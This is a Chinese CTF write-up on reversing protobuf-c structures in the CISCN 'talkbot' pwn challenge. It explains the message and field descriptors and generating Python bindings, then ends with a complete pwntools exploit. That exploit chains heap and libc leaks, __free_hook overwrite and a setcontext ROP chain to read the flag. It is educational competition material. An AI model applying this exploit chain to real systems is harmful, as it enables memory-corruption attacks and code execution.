pwn题中的protobuf逆向

以ciscn初赛的talkbot题为例，详解一下protobuf赛题的一个简单逆向过程。

（麻麻再也不用担心我看不懂protobuf了）

什么是protobuf

Protobuf (Protocol Buffers) 是谷歌开发的一款无关平台，无关语言，可扩展，轻量级高效的序列化结构的数据格式，用于将自定义数据结构序列化成字节流，和将字节流反序列化为数据结构。所以很适合做数据存储和为不同语言，不同应用之间互相通信的数据交换格式，只要实现相同的协议格式，即后缀为proto文件被编译成不同的语言版本，加入各自的项目中，这样不同的语言可以解析其它语言通过Protobuf序列化的数据。目前官方提供c++，java，go等语言支持。

protobuf的安装有很多教程，其中c语言支持需要额外的补丁。

protobuf安装好久了，学习是最近才学的，安装教程大家自己可以上网找一找。

protobuf 使用及其逆向

安装过程不再赘述，要按照protobuf，以及其c语言支持protobuf-c，具体我忘了。

c语言下proto的简单使用

首先需要创建一个.proto文件：

syntax = "proto2";

message devicemsg{
    required sint64 actionid = 1;
    required sint64 msgidx = 2;
    required sint64 msgsize = 3;
    required bytes msgcontent = 4;
}

这个文件描述了一个数据结构，学过c/c++的应该能看懂

一篇文章熟悉Python 开发Protobuf2(Google Protocol Buffers)

这篇文章有介绍proto的语法

之后执行如下命令：

protoc --c_out=. devicemsg.proto

其中，--c_out代表输出的是c语言的proto文件，可以换成--python_out，来便于后期编写python脚本。"=."意味着输出在当前目录下，后面devicemsg.proto是我们上面写的proto文件

之后会生成两个文件：devicemsg.pb-c.h，和devicemsg.pb-c.h

在生成的.c文件里我们会发现一些关键函数

Devicemsg *devicemsg__unpack (ProtobufCAllocator  *allocator, size_t len, const uint8_t *data)
{
  return (Devicemsg *)protobuf_c_message_unpack (&devicemsg__descriptor,
allocator, len, data);
}

size_t devicemsg__pack(const Devicemsg *message, uint8_t *out)
{
  assert(message->base.descriptor == &devicemsg__descriptor);
  return protobuf_c_message_pack ((const ProtobufCMessage*)message, out);
}

pack用来打包（序列化）得到字节流，unpack用来解包（反序列化）得到有结构数据。以这道题为例，题目中就有一个unpack函数用于解包数据。

可以看到unpack函数没啥用，第一个为allocator一般为0，用处不大，第二个为数据包长度，第三个是数据字节流，即我们传输的东西。之后运行了一个内置的函数，其中devicemsg__descriptor，就是一个用于描述先前定义的message结构的数据。而返回地址就是之前定义的message结构体。

容易想到，我们可以通过分析devicemsg__descriptor，来还原message的结构。

关键结构逆向

devicemsg__descriptor为ProtobufCMessageDescriptor类型的一个结构。

struct ProtobufCMessageDescriptor {
	/** Magic value checked to ensure that the API is used correctly. */
	uint32_t			magic;

	/** The qualified name (e.g., "namespace.Type"). */
	const char			*name;
	/** The unqualified name as given in the .proto file (e.g., "Type"). */
	const char			*short_name;
	/** Identifier used in generated C code. */
	const char			*c_name;
	/** The dot-separated namespace. */
	const char			*package_name;

	/**
	 * Size in bytes of the C structure representing an instance of this
	 * type of message.
	 */
	size_t				sizeof_message;

	/** Number of elements in `fields`. */
	unsigned			n_fields;
	/** Field descriptors, sorted by tag number. */
	const ProtobufCFieldDescriptor	*fields;
	/** Used for looking up fields by name. */
	const unsigned			*fields_sorted_by_name;

	/** Number of elements in `field_ranges`. */
	unsigned			n_field_ranges;
	/** Used for looking up fields by id. */
	const ProtobufCIntRange		*field_ranges;

	/** Message initialisation function. */
	ProtobufCMessageInit		message_init;

	/** Reserved for future use. */
	void				*reserved1;
	/** Reserved for future use. */
	void				*reserved2;
	/** Reserved for future use. */
	void				*reserved3;
};

我们关注以下几个结构就行了：

magic，一般为0x28AAEEF9
n_fields，关系到原始的message结构内有几条记录、
fields，这个指向message内所有记录类型组成的一个数组，可以借此逆向分析message结构。

重点是看fields，这个是ProtobufCFieldDescriptor类型的，我们看看这个结构长什么样子。

struct ProtobufCFieldDescriptor {
	/** Name of the field as given in the .proto file. */
	const char		*name;
	/** Tag value of the field as given in the .proto file. */
	uint32_t		id;
	/** Whether the field is `REQUIRED`, `OPTIONAL`, or `REPEATED`. */
	ProtobufCLabel		label;
	/** The type of the field. */
	ProtobufCType		type;
	/**
	 * The offset in bytes of the message's C structure's quantifier field
	 * (the `has_MEMBER` field for optional members or the `n_MEMBER` field
	 * for repeated members or the case enum for oneofs).
	 */
	unsigned		quantifier_offset;
	/**
	 * The offset in bytes into the message's C structure for the member
	 * itself.
	 */
	unsigned		offset;
	/**
	 * A type-specific descriptor.
	 *
	 * If `type` is `PROTOBUF_C_TYPE_ENUM`, then `descriptor` points to the
	 * corresponding `ProtobufCEnumDescriptor`.
	 *
	 * If `type` is `PROTOBUF_C_TYPE_MESSAGE`, then `descriptor` points to
	 * the corresponding `ProtobufCMessageDescriptor`.
	 *
	 * Otherwise this field is NULL.
	 */
	const void		*descriptor; /* for MESSAGE and ENUM types */
	/** The default value for this field, if defined. May be NULL. */
	const void		*default_value;
	/**
	 * A flag word. Zero or more of the bits defined in the
	 * `ProtobufCFieldFlag` enum may be set.
	 */
	uint32_t		flags;
	/** Reserved for future use. */
	unsigned		reserved_flags;
	/** Reserved for future use. */
	void			*reserved2;
	/** Reserved for future use. */
	void			*reserved3;
};

我们只需关注如下：

name，名字，变量名
id，序号，即在message结构体中的顺序（等价于位置）
label，前面标记的required等，这里是proto2的语法，proto3不知道有没有这一项（本人未经验证）
type，数据类型，string还是int64等
label和type都是枚举类型，占4个字节。具体数值与类型的对应关系，可以自己创一个文件现查,下面列出来枚举类型。

typedef enum {
	/** A well-formed message must have exactly one of this field. */
	PROTOBUF_C_LABEL_REQUIRED,
	/**
	 * A well-formed message can have zero or one of this field (but not
	 * more than one).
	 */
	PROTOBUF_C_LABEL_OPTIONAL,
	/**
	 * This field can be repeated any number of times (including zero) in a
	 * well-formed message. The order of the repeated values will be
	 * preserved.
	 */
	PROTOBUF_C_LABEL_REPEATED,
	/**
	 * This field has no label. This is valid only in proto3 and is
	 * equivalent to OPTIONAL but no "has" quantifier will be consulted.
	 */
	PROTOBUF_C_LABEL_NONE,
} ProtobufCLabel;

typedef enum {
	PROTOBUF_C_TYPE_INT32,      /**< int32 */
	PROTOBUF_C_TYPE_SINT32,     /**< signed int32 */
	PROTOBUF_C_TYPE_SFIXED32,   /**< signed int32 (4 bytes) */
	PROTOBUF_C_TYPE_INT64,      /**< int64 */
	PROTOBUF_C_TYPE_SINT64,     /**< signed int64 */
	PROTOBUF_C_TYPE_SFIXED64,   /**< signed int64 (8 bytes) */
	PROTOBUF_C_TYPE_UINT32,     /**< unsigned int32 */
	PROTOBUF_C_TYPE_FIXED32,    /**< unsigned int32 (4 bytes) */
	PROTOBUF_C_TYPE_UINT64,     /**< unsigned int64 */
	PROTOBUF_C_TYPE_FIXED64,    /**< unsigned int64 (8 bytes) */
	PROTOBUF_C_TYPE_FLOAT,      /**< float */
	PROTOBUF_C_TYPE_DOUBLE,     /**< double */
	PROTOBUF_C_TYPE_BOOL,       /**< boolean */
	PROTOBUF_C_TYPE_ENUM,       /**< enumerated type */
	PROTOBUF_C_TYPE_STRING,     /**< UTF-8 or ASCII string */
	PROTOBUF_C_TYPE_BYTES,      /**< arbitrary byte sequence */
	PROTOBUF_C_TYPE_MESSAGE,    /**< nested message */
} ProtobufCType;

继续分析

根据上述内容分析这道题，还原message，如下

syntax = "proto2";

message devicemsg{
    required sint64 actionid = 1;
    required sint64 msgidx = 2;
    required sint64 msgsize = 3;
    required bytes msgcontent = 4;
}

(之前看见一个wp说前三项交互时要乘2，其实是类型他们弄错了，应该是sint64而非int64.这篇wp我列在了下面参考文献中)

但是这里要先解释一个问题，本题在解包后有一句：

func(*(v4 + 3), *(v4 + 4), *(v4 + 5), *(v4 + 6), *(v4 + 7));

v4是解包后返回的message的地址，这里有两个问题：

为什么是从+3开始？（v4为QWORD指针）
为什么从v4里面拉出来了五个参数？

上述还原的message，是用proto语法写的，并非是c语言的struct。实际上，在c中这个message长这个样子：

struct  Devicemsg
{
  ProtobufCMessage base;	//占16个字节，固定数据存放关键信息
  int64_t actionid;
  int64_t msgidx;
  int64_t msgsize;
  ProtobufCBinaryData msgcontent;
};

struct ProtobufCMessage {
	/** The descriptor for this message type. */
	const ProtobufCMessageDescriptor	*descriptor;
	/** The number of elements in `unknown_fields`. */
	unsigned				n_unknown_fields;
	/** The fields that weren't recognized by the parser. */
	ProtobufCMessageUnknownField		*unknown_fields;
};

struct ProtobufCBinaryData {
	size_t	len;        /**< Number of bytes in the `data` field. */
	uint8_t	*data;      /**< Data bytes. */
};

前十六个字节给了base，用来存放一些关键信息

bytes类型，转化为c语言结构时会变成一个结构体，里面存放长度和内容指针。IDA由于没有内置相关结构信息，将其当做八字节数组进行解析，因此会产生一个有5个记录的错觉，实际上后两个参数是同一个记录内置的两条记录。

如何用python配合protobuf进行打包并解题？

生成相关模块

通过如下命令：

protoc --python_out=. devicemsg.proto

有的文章提到了通过pip install grpcio-tools安装这个东西去得到对应文件。注意这题不能用grpcio-tools，千万不要用下面这条语句来生成文件，我这边试了，不管用。

python -m grpc_tools.protoc -I ./ --python_out=./  personal.proto

以上指令解题时请不要使用，如有问题，请在评论区指正。

接下来生成devicemsg_pb2.py文件。

# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: devicemsg.proto
"""Generated protocol buffer code."""
from google.protobuf.internal import builder as _builder
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()


DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x0f\x64\x65vicemsg.proto\"R\n\tdevicemsg\x12\x10\n\x08\x61\x63tionid\x18\x01 \x02(\x12\x12\x0e\n\x06msgidx\x18\x02 \x02(\x12\x12\x0f\n\x07msgsize\x18\x03 \x02(\x12\x12\x12\n\nmsgcontent\x18\x04 \x02(\x0c')

_builder.BuildMessageAndEnumDescriptors(DESCRIPTOR, globals())
_builder.BuildTopDescriptorsAndMessages(DESCRIPTOR, 'devicemsg_pb2', globals())
if _descriptor._USE_C_DESCRIPTORS == False:

  DESCRIPTOR._options = None
  _DEVICEMSG._serialized_start=19
  _DEVICEMSG._serialized_end=101
# @@protoc_insertion_point(module_scope)

之后在exp中将其import进去，利用其中的devicemsg()函数（取决于定义的message的名字）创建类型，利用SerializeToString()函数生成字节流。

可以参考下面的exp，注意运行EXP时一定要用python3，否则生成的生成devicemsg_pb2.py里面会报错。

EXP

不会有人来打ciscn了看到这一题了还不会做这个简单的堆吧......

from pwn import *
import devicemsg_pb2


context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'
context.log_level = 'debug'

ELFpath = '/home/wjc/Desktop/pwn'
libcpath='/home/wjc/Desktop/libc-2.31.so'

p=process(ELFpath)
#p = remote('node4.buuoj.cn', 25965)

e = ELF(ELFpath)
libc=ELF(libcpath)


ru=lambda s :p.recvuntil(s)
rut=lambda s,t :p.recvuntil(s,timeout=t)

r=lambda n :p.recv(n)
sal=lambda d,b:p.sendlineafter(d,b)
sa=lambda d,b:p.sendlineafter(d,b)
sl=lambda s :p.sendline(s)
sls=lambda s :p.sendline(str(s))
ss=lambda s :p.send(str(s))
s=lambda s :p.send(s) 
uu64=lambda data :u64(data.ljust(8,'\x00'))
it=lambda :p.interactive()
b=lambda :gdb.attach(p)
bp=lambda bkp:gdb.attach(p,'b *'+str(bkp))

LOGTOOL = {}

def LOGALL():
    log.success("**** all result ****")
    for i in LOGTOOL.items():
        log.success("%-20s%s" % (i[0]+":", hex(i[1])))

def get_base(a, text_name):
    text_addr = 0
    libc_base = 0
    for name, addr in a.libs().items():
        if text_name in name:
            text_addr = addr
        elif "libc" in name:
            libc_base = addr
    return text_addr, libc_base

def debug():
    text_base, libc_base = get_base(p, 'pwn')
    script = '''
    set $text_base = {}
    set $libc_base = {} 
    b*$rebase(0x1813)
    b*$rebase(0x1542)

    '''.format(text_base, libc_base)
    # b*puts
    # b* _IO_file_xsputn
    # b mprotect
    # b *($text_base+0x0000000000000000F84)
    # b *($text_base+0x000000000000134C)
    # b *($text_base+0x0000000000000000001126)
    # dprintf *($text_base+0x04441),"%c",$ax
    # dprintf *($text_base+0x04441),"%c",$ax
    # 0x12D5
    # 0x04441
    # b *($text_base+0x0000000000001671)
    gdb.attach(p, script)


def sendmsg(content):
    ru('You can try to have friendly communication with me now: ')
    s(content)

def add(idx,size,content):
    msg=devicemsg_pb2.devicemsg()
    msg.actionid=1
    msg.msgidx=idx
    msg.msgsize=size
    msg.msgcontent=content
    sendmsg(msg.SerializeToString())

def edit(idx,content):
    msg=devicemsg_pb2.devicemsg()
    msg.actionid=2
    msg.msgidx=idx
    msg.msgsize=0x50
    msg.msgcontent=content
    sendmsg(msg.SerializeToString())

def show(idx):
    msg=devicemsg_pb2.devicemsg()
    msg.actionid=3
    msg.msgidx=idx
    msg.msgsize=0x40
    msg.msgcontent=b'./flag\x00\x00'
    sendmsg(msg.SerializeToString())

def dele(idx):
    msg=devicemsg_pb2.devicemsg()
    msg.actionid=4
    msg.msgidx=idx
    msg.msgsize=0x40
    msg.msgcontent=b'./flag\x00\x00'
    sendmsg(msg.SerializeToString())

add(0,0x90,b'aaaa')
add(1,0x90,b'aaaa')
dele(0)
dele(1)
show(1)

heapbase=u64(ru('\x00\x00')[-8:])-0x310
LOGTOOL['heapbase']=heapbase

add(2,0x90,b'aaaa')

add(3,0x90,(b'x'*0x10+b'./flag'))
add(4,0x90,b'aaaa')
add(5,0x90,b'aaaa')
add(6,0x90,b'aaaa')
add(7,0x90,b'aaaa')
add(8,0x90,b'aaaa')
add(9,0x90,b'aaaa')

for i in range(3,10):
    dele(i)
dele(2)
show(2)

libcbase=u64(ru('\x7f')[-6:].ljust(8,b'\x00'))-0x1ecbe0
LOGTOOL['libcbase']=libcbase
free_hook=libcbase+libc.symbols['__free_hook']
LOGTOOL['free_hook']=free_hook

edit(9,p64(free_hook))

#0x0000000000023b6a : pop rdi ; ret
pop_rdi_ret=libcbase+0x23b6a
#0x000000000002601f : pop rsi ; ret
pop_rsi_ret=libcbase+0x2601f
#0x0000000000142c92 : pop rdx ; ret
pop_rdx_ret=libcbase+0x142c92
#0x0000000000151990 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
magic_gadget=libcbase+0x151990

read_addr=libcbase+libc.symbols['read']
write_addr=libcbase+libc.symbols['write']
open_addr=libcbase+libc.symbols['open']
setcontext=libcbase+libc.symbols['setcontext']

flag_addr=heapbase+0x2000
flag_str=heapbase+0x320
rop_addr=heapbase+0xba0+0x10
heap_7=heapbase+0x1230+0x10

pay =p64(0)*2
pay+=p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(flag_addr)+p64(pop_rdx_ret)+p64(0x30)+p64(read_addr)
pay+=p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(flag_addr)+p64(pop_rdx_ret)+p64(0x30)+p64(write_addr)

fake_context_head =p64(0)+p64(heap_7+0x10)
fake_context =b'\x00'*0x20
fake_context+=p64(setcontext+61)
fake_context =fake_context.ljust(0x68,b'\x00')
fake_context+=p64(flag_str)
fake_context+=p64(0)
fake_context+=p64(0)
fake_context =fake_context.ljust(0xA0,b'\x00')
fake_context+=p64(rop_addr)
fake_context+=p64(open_addr)

fake_context=fake_context_head+fake_context

add(10,0xf0,fake_context)
edit(8,pay)

add(11,0x90,b'aaa')
add(12,0x90,p64(magic_gadget))

LOGALL()
debug()

dele(10)


it()